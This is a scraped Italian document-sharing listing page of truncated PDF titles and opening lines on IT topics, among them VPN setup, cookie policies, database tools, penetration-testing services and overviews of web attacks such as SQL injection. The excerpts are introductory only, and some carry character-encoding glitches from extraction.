SerWeb. Modulo Drupal per u/lizzare i servizi studen/ dell Università di Napoli Parthenope

SerWeb. Modulo Drupal per u/lizzare i servizi studen/ dell Università di Napoli Parthenope SerWeb Modulo Drupal per u/lizzare i servizi studen/ dell Università di Napoli Parthenope Informazioni progeio SerWeb il nome nasce fondendo i sostan/vi dell obielvo del modulo cioè Servizi Web. Il modulo

Dettagli

Tracciabilità degli utenti in applicazioni multipiattaforma

Tracciabilità degli utenti in applicazioni multipiattaforma Tracciabilità degli utenti in applicazioni multipiattaforma Case Study assicurativo/bancario Yann Bongiovanni y.bongiovanni@integra-group.it Roma, 4 ottobre 2006 Retroscena Un azienda multinazionale del

Dettagli

Attacco alle WebMail basate su Memova: tampering dei parametri di inoltro automatico

Attacco alle WebMail basate su Memova: tampering dei parametri di inoltro automatico Attacco alle WebMail basate su Memova: tampering dei parametri di inoltro automatico Rosario Valotta Matteo Carli Indice Attacco alle WebMail basate su Memova:... 1 tampering dei parametri di inoltro automatico...

Dettagli

Security Scan e Penetration Testing

Security Scan e Penetration Testing Security Scan e Penetration Testing esperienze di una realtà specializzata http://www.infosec.it info@infosec.it Il Net Probing INFOSEC Relatore: Stefano Venturoli Infosecurity 2002 Security Scan e Penetration

Dettagli

Corso di Web programming Modulo T3 A2 - Web server

Corso di Web programming Modulo T3 A2 - Web server Corso di Web programming Modulo T3 A2 - Web server 1 Prerequisiti Pagine statiche e dinamiche Pagine HTML Server e client Cenni ai database e all SQL 2 1 Introduzione In questa Unità si illustra il concetto

Dettagli

Application Assessment Applicazione ARCO

Application Assessment Applicazione ARCO GESI Application Assessment Applicazione ARCO Versione 2 Milano 14 Luglio 2006 Hacking Team S.r.l. http://www.hackingteam.it Via della Moscova, 13 info@hackingteam.it 20121 MILANO (MI) - Italy Tel. +39.02.29060603

Dettagli

Navigazione automatica e rilevazione di errori in applicazioni web

Navigazione automatica e rilevazione di errori in applicazioni web Politecnico di Milano Navigazione automatica e rilevazione di errori in applicazioni web Relatore: Prof. Stefano Zanero Fabio Quarti F e d e r i c o V i l l a A.A. 2006/2007 Sommario Obiettivo: Illustrare

Dettagli

RUBRICA ERP L implementazione e la gesone di un ERP può seguire i principi dell IT Governance? L IT Governance applicata ai sistemi ERP

RUBRICA ERP L implementazione e la gesone di un ERP può seguire i principi dell IT Governance? L IT Governance applicata ai sistemi ERP RUBRICA ERP L implementazione e la gesone di un ERP può seguire i principi dell IT Governance? L IT Governance applicata ai sistemi ERP INDICE Introduzione Intervista all Ing. Paolo Di Mar!no, Responsabile

Dettagli

DNNCenter. Installazione standard di DotNetNuke 5. per Windows Vista. Installazione Standard DotNetNuke 5 per Windows Vista

DNNCenter. Installazione standard di DotNetNuke 5. per Windows Vista. Installazione Standard DotNetNuke 5 per Windows Vista DNNCenter Installazione standard di DotNetNuke 5 per Windows Vista Copyright OPSI Srl www.opsi.it Pag. 1 of 28 INDICE 1. INTRODUZIONE... 3 1.1. Pre-requisiti... 3 2. DOWNLOAD DOTNETNUKE... 4 2.1. Download

Dettagli

KLEIS WEB APPLICATION FIREWALL

KLEIS WEB APPLICATION FIREWALL KLEIS WEB APPLICATION FIREWALL VERSIONE 2.1 Presentazione www.kwaf.it Cos'è Kleis Web Application Firewall? Kleis Web Application Firewall (KWAF) è un firewall software per la difesa di: Web Application

Dettagli

penetration test (ipotesi di sviluppo)

penetration test (ipotesi di sviluppo) penetration test (ipotesi di sviluppo) 1 Oggetto... 3 2 Premesse... 3 3 Attività svolte durante l analisi... 3 3.1 Ricerca delle vulnerabilità nei sistemi... 4 3.2 Ricerca delle vulnerabilità nelle applicazioni

Dettagli

Cookie Policy per www.lalocandadisettala.com

Cookie Policy per www.lalocandadisettala.com Policy per www.lalocandadisettala.com Uso dei cookie Il "Sito" (www.lalocandadisettala.com) utilizza i per rendere i propri servizi semplici e efficienti per l utenza che visiona le pagine di www.lalocandadisettala.com.

Dettagli

Attacchi alle Applicazioni Web

Attacchi alle Applicazioni Web Attacchi alle Applicazioni Web http://www.infosec.it info@infosec.it Relatore: Matteo Falsetti Webbit03 Attacchi alle Applicazioni Web- Pagina 1 Applicazioni web: definizioni, scenari, rischi ICT Security

Dettagli

VULNERABILITY ASSESSMENT E PENETRATION TEST

VULNERABILITY ASSESSMENT E PENETRATION TEST VULNERABILITY ASSESSMENT E PENETRATION TEST Una corretta gestione della sicurezza si basa innanzitutto su un adeguata conoscenza dell attuale livello di protezione dei propri sistemi. Partendo da questo

Dettagli

2 Configurazione lato Router

2 Configurazione lato Router (Virtual Private Network), è un collegamento a livello 3 (Network) stabilito ed effettuato tra due o più reti LAN attraverso una rete pubblica che non deve essere necessariamente Internet. La particolarità

Dettagli

Penalizzazioni SEO di Google Come evitarle, riconoscerle, recuperare

Penalizzazioni SEO di Google Come evitarle, riconoscerle, recuperare Penalizzazioni SEO di Google Come evitarle, riconoscerle, recuperare Padova 08/11/2013 Fabio Su)o Fabio Su)o h)p://www.linkedin.com/in/su)o h)p://twi)er.com/#!/fsu)o h)p://www.facebook.com/fsu)o Penalizzazioni

Dettagli

La VPN con il FRITZ!Box Parte I. La VPN con il FRITZ!Box Parte I

La VPN con il FRITZ!Box Parte I. La VPN con il FRITZ!Box Parte I La VPN con il FRITZ!Box Parte I 1 Introduzione In questa mini-guida illustreremo come realizzare un collegamento tramite VPN(Virtual Private Network) tra due FRITZ!Box, in modo da mettere in comunicazioni

Dettagli

v. 1.0-7-11-2007 Mistral ArchiWeb 2.0 Manuale utente

v. 1.0-7-11-2007 Mistral ArchiWeb 2.0 Manuale utente v. 1.0-7-11-2007 Mistral ArchiWeb 2.0 Manuale utente Sommario 1. INTRODUZIONE...3 2. DESCRIZIONE FUNZIONALITÀ...3 2.1. LOGIN...3 2.2. SCHEDA ARCHIVIO...3 2.3. GESTIONE ARCHIVI...4 2.3.1 Creazione nuovo

Dettagli

LA RIVOLUZIONE DIGITALE E LE NUOVE OPPORTUNITÁ PER LE IMPRESE

LA RIVOLUZIONE DIGITALE E LE NUOVE OPPORTUNITÁ PER LE IMPRESE LA RIVOLUZIONE DIGITALE E LE NUOVE OPPORTUNITÁ PER LE IMPRESE Durata: 24 ore Calendario: 8 appuntamen semanali (dalle 19.30 alle 22.30) a parre dal mese di maggio Prezzo: 100,00 + iva, grazie ai contribu

Dettagli

Guida Pro di Email Verifier

Guida Pro di Email Verifier Guida Pro di Email Verifier 1) SOMMARIO 2) ISTRUZIONI DI BASE 3) CONFIGURAZIONE 1) SOMMARIO Pro Email Verifier è un programma che si occupa della verifica della validità di un certo numero di indirizzo

Dettagli

Esercitazione 8. Basi di dati e web

Esercitazione 8. Basi di dati e web Esercitazione 8 Basi di dati e web Rev. 1 Basi di dati - prof. Silvio Salza - a.a. 2014-2015 E8-1 Basi di dati e web Una modalità tipica di accesso alle basi di dati è tramite interfacce web Esiste una

Dettagli

LA RIVOLUZIONE DIGITALE E LE NUOVE OPPORTUNITÁ PER LE IMPRESE

LA RIVOLUZIONE DIGITALE E LE NUOVE OPPORTUNITÁ PER LE IMPRESE LA RIVOLUZIONE DIGITALE E LE NUOVE OPPORTUNITÁ PER LE IMPRESE Durata: 24 ore Calendario: 8 appuntamen semanali (dalle 19.30 alle 22.30) a parre dal mese di maggio Prezzo: 100,00 + iva, grazie ai contribu

Dettagli

Questo punto richiederebbe uno sviluppo molto articolato che però a mio avviso va al di là delle possibilità fornite al candidato dal tempo a disposizione. Mi limiterò quindi ad indicare dei criteri di

Dettagli

Questa tipologia di cookie permette il corretto funzionamento di alcune sezioni del Sito. Sono di due categorie: persistenti e di sessione:

Questa tipologia di cookie permette il corretto funzionamento di alcune sezioni del Sito. Sono di due categorie: persistenti e di sessione: Informativa estesa sui Cookie Cosa sono i cookies? In informatica i cookie HTTP (più comunemente denominati Web cookie, tracking cookie o semplicemente cookie) sono righe di testo usate per eseguire autenticazioni

Dettagli

SQL Injection: i 5 migliori tool per individuarle

SQL Injection: i 5 migliori tool per individuarle SQL Injection: i 5 migliori tool per individuarle SQL Injection è la principale tecnica sfruttata per colpire una applicazione web basata su un database di tipo SQL, potrebbe consentire ad un malintenzionato

Dettagli

Single Sign On sul web

Single Sign On sul web Single Sign On sul web Abstract Un Sigle Sign On (SSO) è un sistema di autenticazione centralizzata che consente a un utente di fornire le proprie credenziali una sola volta e di accedere a molteplici

Dettagli

SPEAKUP BIG DATA. In Europa: In Italia. Le cara3eris6che principali dei Big Data, si possono riassumere nelle seguen6 cara3eris6che:

SPEAKUP BIG DATA. In Europa: In Italia. Le cara3eris6che principali dei Big Data, si possono riassumere nelle seguen6 cara3eris6che: SPEAKUP BIG DATA SPEAKUP BIG DATA raccolta e u*lizzo a scopi commerciali, di da* personali, ineren* la navigazione e le abitudini in rete degli uten*, sopra6u6o da parte di società che forniscono servizi

Dettagli

White Paper 1. INTRODUZIONE...2 2. TECNOLOGIE SOFTWARE IMPIEGATE...2 3. APPROCCIO PROGETTUALE...10 3. RISULTATI...10

White Paper 1. INTRODUZIONE...2 2. TECNOLOGIE SOFTWARE IMPIEGATE...2 3. APPROCCIO PROGETTUALE...10 3. RISULTATI...10 Soluzioni software di EDM "Electronic Document Management" Gestione dell archiviazione, indicizzazione, consultazione e modifica dei documenti elettronici. Un approccio innovativo basato su tecnologie

Dettagli

Installazione SQL Server 2005 Express Edition

Installazione SQL Server 2005 Express Edition Supporto On Line Allegato FAQ FAQ n.ro MAN-6S4ALG7637 Data ultima modifica 25/08/2010 Prodotto Tutti Modulo Tutti Oggetto Installazione SQL Server 2005 Express Edition In giallo sono evidenziate le modifiche/integrazioni

Dettagli

Traduzione e computer (3) Cris%na Bosco Informa%ca applicata alla comunicazione mul%mediale 2014-2015

Traduzione e computer (3) Cris%na Bosco Informa%ca applicata alla comunicazione mul%mediale 2014-2015 Traduzione e computer (3) Cris%na Bosco Informa%ca applicata alla comunicazione mul%mediale 2014-2015 Tipi di sistemi Fino alla metà degli anni 90 esistono solo due ;pi di sistemi di MT: Sistemi su mainframe

Dettagli

GUIDA UTENTE WEB PROFILES

GUIDA UTENTE WEB PROFILES GUIDA UTENTE WEB PROFILES GUIDA UTENTE WEB PROFILES... 1 Installazione... 2 Primo avvio e registrazione... 5 Utilizzo di web profiles... 6 Gestione dei profili... 8 Fasce orarie... 13 Log siti... 14 Pag.

Dettagli

Introduzione a phpmyadmin

Introduzione a phpmyadmin Introduzione a phpmyadmin http://www.phpmyadmin.net Per chiarimenti, http://www.ing.unibs.it/~alberto.lazzaroni 1 phpmyadmin: cosa è, a cosa serve È un software di amministrazione di database MySql (MySql

Dettagli

Informativa estesa sui Cookie e sulla privacy

Informativa estesa sui Cookie e sulla privacy Informativa estesa sui Cookie e sulla privacy Cosa sono i cookies? In informatica i cookie HTTP (più comunemente denominati Web cookie, tracking cookie o semplicemente cookie) sono righe di testo usate

Dettagli

RELAZIONE DI PROGETTO DELL ESAME STRUMENTI PER APPLICAZIONI WEB

RELAZIONE DI PROGETTO DELL ESAME STRUMENTI PER APPLICAZIONI WEB RELAZIONE DI PROGETTO DELL ESAME STRUMENTI PER APPLICAZIONI WEB Studente: Nigro Carlo N.mat.: 145559 Tema: Negozio virtuale Nome sito: INFOTECH Url: http://spaw.ce.unipr.it/progetti/infotech Per il progetto

Dettagli

SAIPEM INDICAZIONI DI MASSIMA COSTO PROGETTI DI SICUREZZA

SAIPEM INDICAZIONI DI MASSIMA COSTO PROGETTI DI SICUREZZA SAIPEM INDICAZIONI DI MASSIMA COSTO PROGETTI DI SICUREZZA Vulnerability Assessment L attività consiste nell analisi approfondita delle vulnerabilità tecnologiche a cui sono soggetti i sistemi perimetrali

Dettagli

Monitoraggio di outsourcer e consulenti remoti

Monitoraggio di outsourcer e consulenti remoti 1 Monitoraggio di outsourcer e consulenti remoti Un Whitepaper di Advanction e ObserveIT Daniel Petri 2 Sommario Esecutivo Nel presente whitepaper verrà mostrato come registrare le sessioni remote su gateway

Dettagli

UBIQUITY 6 e Server. Il documento descrive le novità introdotte con la versione 6 della piattaforma software ASEM Ubiquity.

UBIQUITY 6 e Server. Il documento descrive le novità introdotte con la versione 6 della piattaforma software ASEM Ubiquity. UBIQUITY 6 e Server Privato Introduzione Il documento descrive le novità introdotte con la versione 6 della piattaforma software ASEM Ubiquity. Versione Descrizione Data 1 Prima emissione 21/06/2015 Disclaimer

Dettagli

FidelJob gestione Card di fidelizzazione

FidelJob gestione Card di fidelizzazione FidelJob gestione Card di fidelizzazione Software di gestione card con credito in Punti o in Euro ad incremento o a decremento, con funzioni di ricarica Card o scala credito da Card. Versione archivio

Dettagli

Infrastru)ura Sistema Informa0vo. Guido Guizzun0 31 Gennaio 2011

Infrastru)ura Sistema Informa0vo. Guido Guizzun0 31 Gennaio 2011 Infrastru)ura Sistema Informa0vo Guido Guizzun0 31 Gennaio 2011 Sommario Sistema Informa0vo al CNAF Riorganizzazione server Spostamento server VamWeb Reinstallazione del sistema presenze Ges0one backup

Dettagli

Quesiti 6 e 7) - 9 - Creiamo il file query4.php su una piattaforma OPEN SOURCE usando in linguaggio PHP ospitato su un webserver APACHE per interrogare un database MYSQL. Tale file verrà attivato cliccando

Dettagli

CUBE firewall. Lic. Computers Center. aprile 2003 Villafranca di Verona, Italia

CUBE firewall. Lic. Computers Center. aprile 2003 Villafranca di Verona, Italia CUBE firewall Lic. Computers Center aprile 2003 Villafranca di Verona, Italia ! " #! $ # % $ & 2000 1500 1000 Costo 500 0 Costo per l implentazione delle misure di sicurezza Livello di sicurezza ottimale

Dettagli

La VPN con il FRITZ!Box Parte I. La VPN con il FRITZ!Box Parte I

La VPN con il FRITZ!Box Parte I. La VPN con il FRITZ!Box Parte I La VPN con il FRITZ!Box Parte I 1 Descrizione Ogni utente di Internet può scambiare dati ed informazioni con qualunque altro utente della rete. I dati scambiati viaggiano nella nuvola attraverso una serie

Dettagli

Co.El.Da. Software S.r.l. Coelda.Ne Caratteristiche tecniche

Co.El.Da. Software S.r.l.  Coelda.Ne Caratteristiche tecniche Co..El. Da. Software S..r.l.. Coelda.Net Caratteristiche tecniche Co.El.Da. Software S.r.l.. Via Villini Svizzeri, Dir. D Gullì n. 33 89100 Reggio Calabria Tel. 0965/920584 Faxx 0965/920900 sito web: www.coelda.

Dettagli

Brand reputa+on: lo specchio del Revenue Tina Ingaldi Consulente Revenue e Marke5ng

Brand reputa+on: lo specchio del Revenue Tina Ingaldi Consulente Revenue e Marke5ng s Brand reputa+on: lo specchio del Revenue Tina Ingaldi Consulente Revenue e Marke5ng Brand Reputation La reputazione di un marchio passa oggi anche a

Dettagli

Workgroup. Windows NT dispone di due strutture di rete

Workgroup. Windows NT dispone di due strutture di rete Descrizione generale dell architettura del sistema e dell interazione tra i suoi componenti. Descrizione del sottosistema di sicurezza locale. Descrizione delle tecniche supportate dal sistema per l organizzazione

Dettagli

19. LA PROGRAMMAZIONE LATO SERVER

19. LA PROGRAMMAZIONE LATO SERVER 19. LA PROGRAMMAZIONE LATO SERVER Introduciamo uno pseudocodice lato server che chiameremo Pserv che utilizzeremo come al solito per introdurre le problematiche da affrontare, indipendentemente dagli specifici

Dettagli

IL WEB NON SI LIMITA A COLLEGARE MACCHINE.

IL WEB NON SI LIMITA A COLLEGARE MACCHINE. IL WEB NON SI LIMITA A COLLEGARE MACCHINE. CONNETTE DELLE PERSONE PROPONENTI Egidio Murru, CEO, Founder, Comunica1on Manager Elia Con/ni, CTO, Founder, User Expirience Designer / Front End Engineer Sassari,

Dettagli

PRIVACY E SICUREZZA http://www.moviwork.com http://www.moviwork.com de.co dsign&communication di Celestina Sgroi

PRIVACY E SICUREZZA http://www.moviwork.com http://www.moviwork.com de.co dsign&communication di Celestina Sgroi PRIVACY E SICUREZZA LA PRIVACY DI QUESTO SITO In questa pagina si descrivono le modalità di gestione del sito in riferimento al trattamento dei dati personali degli utenti che lo consultano. Tale politica

Dettagli

Console di Amministrazione Centralizzata Guida Rapida

Console di Amministrazione Centralizzata Guida Rapida Console di Amministrazione Centralizzata Contenuti 1. Panoramica... 2 Licensing... 2 Panoramica... 2 2. Configurazione... 3 3. Utilizzo... 4 Gestione dei computer... 4 Visualizzazione dei computer... 4

Dettagli

SERVICE BROWSER. Versione 1.0

SERVICE BROWSER. Versione 1.0 SERVICE BROWSER Versione 1.0 25/09/2008 Indice dei Contenuti 1. Scopo del documento... 3 2. Introduzione... 3 3. Accordi di Servizio... 4 4. Servizi... 5 5. Servizio: Schede Erogatori... 8 6. Servizio:

Dettagli

La parte client è invece un programma che si chiama mysql. Gli altri eseguibili (client) fondamentali sono mysqladmin, mysqldump.

La parte client è invece un programma che si chiama mysql. Gli altri eseguibili (client) fondamentali sono mysqladmin, mysqldump. Panoramica MySQL MySQL è un RDBMS free ed open source, nativo dell ambiente Linux ma disponibile anche su piattaforme Windows e MAC OS. E stato pensato come prodotto leggero come contenitore di dati a

Dettagli

w w w. n e w s o f t s r l. i t Soluzione Proposta

w w w. n e w s o f t s r l. i t Soluzione Proposta w w w. n e w s o f t s r l. i t Soluzione Proposta Sommario 1. PREMESSA...3 2. NSPAY...4 2.1 FUNZIONI NSPAY... 5 2.1.1 Gestione degli addebiti... 5 2.1.2 Inibizione di un uso fraudolento... 5 2.1.3 Gestione

Dettagli

Lyra CRM WebAccess. Pag. 1 di 16

Lyra CRM WebAccess. Pag. 1 di 16 Lyra CRM WebAccess L applicativo Lyra CRM, Offer & Service Management opera normalmente in architettura client/server: il database di Lyra risiede su un Server aziendale a cui il PC client si connette

Dettagli

Manuale LiveBox WEB AMMINISTRATORE DI SISTEMA. http://www.liveboxcloud.com

Manuale LiveBox WEB AMMINISTRATORE DI SISTEMA. http://www.liveboxcloud.com 2015 Manuale LiveBox WEB AMMINISTRATORE DI SISTEMA http://www.liveboxcloud.com LiveBox Srl non rilascia dichiarazioni o garanzie in merito al contenuto o uso di questa documentazione e declina qualsiasi

Dettagli

Introduzione a Oracle 9i

Introduzione a Oracle 9i Introduzione a Oracle 9i Ing. Vincenzo Moscato - Overview sull architettura del DBMS Oracle 9i L architettura di Oracle 9i si basa sul classico paradigma di comunicazione client-server, in cui sono presenti

Dettagli

PTSv2 in breve: La scelta migliore per chi vuole diventare un Penetration Tester. Online, accesso flessibile e illimitato

PTSv2 in breve: La scelta migliore per chi vuole diventare un Penetration Tester. Online, accesso flessibile e illimitato La scelta migliore per chi vuole diventare un Penetration Tester PTSv2 in breve: Online, accesso flessibile e illimitato 900+ slide interattive e 3 ore di lezioni video Apprendimento interattivo e guidato

Dettagli

Manuale Gestione di OpenSPCoop 1.4 i. Manuale Gestione di OpenSPCoop 1.4

Manuale Gestione di OpenSPCoop 1.4 i. Manuale Gestione di OpenSPCoop 1.4 i Manuale Gestione di OpenSPCoop 1.4 ii Copyright 2005-2011 Link.it srl iii Indice 1 Introduzione 1 2 Prerequisiti per la Configurazione della Porta di Dominio 1 2.1 Verifica dell applicazione di gestione

Dettagli

Notifica sul Copyright

Notifica sul Copyright Parallels Panel Notifica sul Copyright ISBN: N/A Parallels 660 SW 39 th Street Suite 205 Renton, Washington 98057 USA Telefono: +1 (425) 282 6400 Fax: +1 (425) 282 6444 Copyright 1999-2009, Parallels,

Dettagli

SVN server, per Florim, è installato su server di test, anche se la sua configurazione può avvenire in qualsiasi ambiente.

SVN server, per Florim, è installato su server di test, anche se la sua configurazione può avvenire in qualsiasi ambiente. Siti FLORIM SVN Subversion Il sistema di versioning viene illustrato nell immagine seguente: Sistema locale dello sviluppatore, si parla di working copy ( copia dei file dal server in produzione) SVN server,

Dettagli

Interstudio L INGEGNERE NELLE NUVOLE. App, WEB App e Cloud. ing. Sauro Agostini. Architectural & Engineering Software. venerdì 11 ottobre 13

Interstudio L INGEGNERE NELLE NUVOLE. App, WEB App e Cloud. ing. Sauro Agostini. Architectural & Engineering Software. venerdì 11 ottobre 13 Architectural & Engineering Software L INGEGNERE NELLE NUVOLE App, WEB App e Cloud ing. Sauro Agostini Mitterand 1981 Reagan Battaglin Alice IBM PC 5150 Alonso C ERA UNA VOLTA IL DOS Non è una rivoluzione,

Dettagli

Legenda: Vengono riportate qui brevi descrizioni di alcuni dei più noti e comuni tipi di vulnerabilità,in base al loro grado di pericolosità.

Legenda: Vengono riportate qui brevi descrizioni di alcuni dei più noti e comuni tipi di vulnerabilità,in base al loro grado di pericolosità. Legenda: Vengono riportate qui brevi descrizioni di alcuni dei più noti e comuni tipi di vulnerabilità,in base al loro grado di pericolosità. Livello di Pericolosità 3: Login Cracking: Il cracking è il

Dettagli

Cookie Policy per www.ligurealassio.it

Cookie Policy per www.ligurealassio.it Cookie Policy per www.ligurealassio.it Uso dei cookie Il "Sito" (www.ligurealassio.it) utilizza i Cookie per rendere i propri servizi semplici e efficienti per l utenza che visiona le pagine di www.ligurealassio.it.

Dettagli

Registro elettronico scuola ospedaliera rel. 7.0

Registro elettronico scuola ospedaliera rel. 7.0 Registro elettronico scuola ospedaliera rel. 7.0 MANUALE DI INSTALLAZIONE 1/12 MANUALE DI INSTALLAZIONE Informazione per gli utenti Il registro elettronico è un applicazione software sviluppata con licenza

Dettagli

Manuale gestione Porta di Dominio OpenSPCoop 1.1

Manuale gestione Porta di Dominio OpenSPCoop 1.1 i Manuale gestione Porta di Dominio ii Copyright 2005-2008 Link.it srl Questo documento contiene informazioni di proprietà riservata, protette da copyright. Tutti i diritti sono riservati. Non è permesso

Dettagli

Guida ai Servizi Internet per il Referente Aziendale

Guida ai Servizi Internet per il Referente Aziendale Guida ai Servizi Internet per il Referente Aziendale Indice Indice Introduzione...3 Guida al primo accesso...3 Accessi successivi...5 Amministrazione dei servizi avanzati (VAS)...6 Attivazione dei VAS...7

Dettagli

DB2 Universal Database (UDB) DB2 Universal Database (UDB)

DB2 Universal Database (UDB) DB2 Universal Database (UDB) DB2 Universal Database (UDB) Sistemi Informativi L-A Home Page del corso: http://www-db.deis.unibo.it/courses/sil-a/ Versione elettronica: DB2Presentazione2009.pdf Sistemi Informativi L-A DB2 Universal

Dettagli

SQL Injection The dark side of webapplication *** Siamo davvero certi che chi gestisce i nostri dati sensibili lo faccia in modo sicuro?

SQL Injection The dark side of webapplication *** Siamo davvero certi che chi gestisce i nostri dati sensibili lo faccia in modo sicuro? SQL Injection The dark side of webapplication *** Siamo davvero certi che chi gestisce i nostri dati sensibili lo faccia in modo sicuro? Che cos'e' SQL? Acronimo di 'Structured Query Language E' un linguaggio

Dettagli

ACCESSO REMOTO via WEB

ACCESSO REMOTO via WEB ACCESSO REMOTO via WEB Questo documento descrive tutti i passi necessari per la configurazione di una rete internet in modo da permettere un accesso remoto ad utenti abilitati per la configurazione e l

Dettagli

Corso di Informatica Modulo T3 B1 Programmazione web

Corso di Informatica Modulo T3 B1 Programmazione web Corso di Informatica Modulo T3 B1 Programmazione web 1 Prerequisiti Architettura client/server Elementi del linguaggio HTML web server SQL server Concetti generali sulle basi di dati 2 1 Introduzione Lo

Dettagli

Individuare Web Shell nocive con PHP Shell

Individuare Web Shell nocive con PHP Shell http://www.readability.com/articles/7e9rlg94 html.it ORIGINAL PAGE Individuare Web Shell nocive con PHP Shell Detector by ANDREA DRAGHETTI Una shell Web è uno script, comunemente scritto in PHP, in grado

Dettagli

Flavio De Paoli depaoli@disco.unimib.it

Flavio De Paoli depaoli@disco.unimib.it Flavio De Paoli depaoli@disco.unimib.it 1 Il web come architettura di riferimento Architettura di una applicazione web Tecnologie lato server: Script (PHP, Pyton, Perl), Servlet/JSP, ASP Tecnologie lato

Dettagli

WEB TECHNOLOGY. Il web connette. LE persone. E-book n 2 - Copyright Reserved

WEB TECHNOLOGY. Il web connette. LE persone. E-book n 2 - Copyright Reserved WEB TECHNOLOGY Il web connette LE persone Indice «Il Web non si limita a collegare macchine, ma connette delle persone» Il Www, Client e Web Server pagina 3-4 - 5 CMS e template pagina 6-7-8 Tim Berners-Lee

Dettagli